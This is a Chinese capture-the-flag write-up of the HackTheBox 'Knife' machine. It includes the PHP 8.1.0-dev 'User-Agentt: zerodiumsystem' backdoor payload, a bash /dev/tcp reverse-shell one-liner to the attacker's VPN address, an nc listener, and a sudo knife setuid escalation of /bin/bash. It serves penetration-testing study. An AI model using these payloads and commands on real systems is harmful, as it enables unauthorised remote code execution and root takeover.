HackTheBox-Knife靶场实战

  • A+
所属分类:安全文章
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。


感谢群友@rural老哥的投稿,感谢分享 HackTheBox-Knife靶场实战 。在这篇文章详细记录了他打“HackTheBox-Knife”靶场的整个过程,希望大家能够从中有所收获。HackTheBox-Knife靶场实战




首先连接openvpn实现访问到靶机

HackTheBox-Knife靶场实战

ping一下靶机地址测试网络连通
HackTheBox-Knife靶场实战

nmap来扫描服务器开了什么端口
HackTheBox-Knife靶场实战

从这里可以看出靶机开了22和80端口,随手试了几个ssh的弱口令没啥用,只能从80端口入手了,先访问网站
HackTheBox-Knife靶场实战

首页没发现可以利用的地方,再用dirsearch扫一波目录
HackTheBox-Knife靶场实战
HackTheBox-Knife靶场实战

扫描出来的目录访问之后没啥作用,我们来识别一波CMS用kali的whatweb来识别一波
HackTheBox-Knife靶场实战

这里看到了X-Powered-By[PHP/8.1.0-dev]不同寻常百度之后果然有问题,X-Powered-By是响应头里面的内容会泄露php的版本信息,而PHP/8.1.0-dev这个版本的php会有一个后门

漏洞描述
PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。

这边我们直接抓包并发送到重发器试试命令执行的结果
User-Agentt: zerodiumsystem("ifconfig");

HackTheBox-Knife靶场实战


现在就好办了直接反弹shell,本机vpn的ip
bash -c 'exec bash -i &>/dev/tcp/10.10.14.3/4444 <&1'
HackTheBox-Knife靶场实战

而我们在本机用执行nc监听端口
nc -nvlp 4444
HackTheBox-Knife靶场实战
HackTheBox-Knife靶场实战
HackTheBox-Knife靶场实战

得到反弹的shell,权限并不高,而且nc的shell不好用,所以用python来得到一个更好用的shell,好多语言都可以调用shell,你现在linux系统基本自带python所以python更加方便
python -c 'import pty; pty.spawn("/bin/bash")'

which python可以查看有没有python语言环境,这里有python3环境
HackTheBox-Knife靶场实战

我们执行语句获取shell
HackTheBox-Knife靶场实战

此用户权限较低,我们来提权
sudo -l     可以知道我们了不用root密码来执行某些文件
HackTheBox-Knife靶场实战

这边可以无密执行/usr/bin/knife文件,查看文件发现是ruby脚本的文件
HackTheBox-Knife靶场实战

搜索了一下这个文件是一个ruby的包运行之后提示需要传递一个子命令
HackTheBox-Knife靶场实战

这边是个setuid的提权,我找的了一个大佬的解释:

setuid

setuid是类unix系统提供的一个标志位, 其实际意义是set一个process的euid为这个可执行文件或程序的拥有者(比如root)的uid, 也就是说当setuid位被设置之后, 当文件或程序(统称为executable)被执行时, 操作系统会赋予文件所有者的权限, 因为其euid是文件所有者的uid


举个例子

setuid的方法是使用Linux的chmod指令,我们都习惯给予一个文件类似“0750” “0644” 之类的权限,它们的最高位0就是setuid的位置, 我们可以通过将其设为4来设置setuid位。(tips:设置为2为setgid,同setuid类似,即赋予文件所在组的权限)。

chmod 4750 文件名orchmod u+s 文件名

在这个命令执行之后, 我们再通过ls -l命令查看文件时, 可以发现文件owner权限的x 位变成了s ,这就说明setuid权限已经被设置, 之后任何user执行这个文件时(user需要有文件的执行权限), 都会以root的权限运行(此文件的owner为root)。所以,针对一个需要被很多user以root权限执行的文件, 我们可以通过setuid来进行操作, 这样就不必为所有user都添加sudo 命令。


tips
在使用setuid时, 需要保证此文件有被执行的权限(x), 如果没有执行权限。在使用ls -l查看权限时, 会发现setuid位被设置为了大写的S, 这说明setuid位没有被设置成功。

原文链接:

https://blog.csdn.net/weixin_44575881/article/details/86552016


这边继续来提权,ruby执行命令方法exec,system,和%x。我们写一个赋予/bin/bash setuid的脚本

echo “system(‘chmod +s /bin/bash’)” > j.rb
HackTheBox-Knife靶场实战

我们james用户具有执行knife的权限并且是以root权限运行,所以写一个脚本来给/bin/bash/赋予setuid位
sudo /usr/bin/knife exec j.rb   通过knife执行我们写的脚本

HackTheBox-Knife靶场实战


sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具
/bin/bash -p

–posix 这个指令是需要用到root权限的,由于设置了setuid所以实现了提权
HackTheBox-Knife靶场实战

这样就可以拿到两个flag了
HackTheBox-Knife靶场实战

最后提交拿到胜利!!
HackTheBox-Knife靶场实战



关注公众号回复“9527”可免费获取一套HTB靶场文档和视频,1120”安全参考等安全杂志PDF电子版,1208”个人常用高效爆破字典0221”2020年酒仙桥文章打包还在等什么?赶紧点击下方名片关注学习吧!

推 荐 阅 读




HackTheBox-Knife靶场实战
HackTheBox-Knife靶场实战
HackTheBox-Knife靶场实战

欢 迎 私 下 骚 扰



HackTheBox-Knife靶场实战

本文始发于微信公众号(潇湘信安):HackTheBox-Knife靶场实战

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: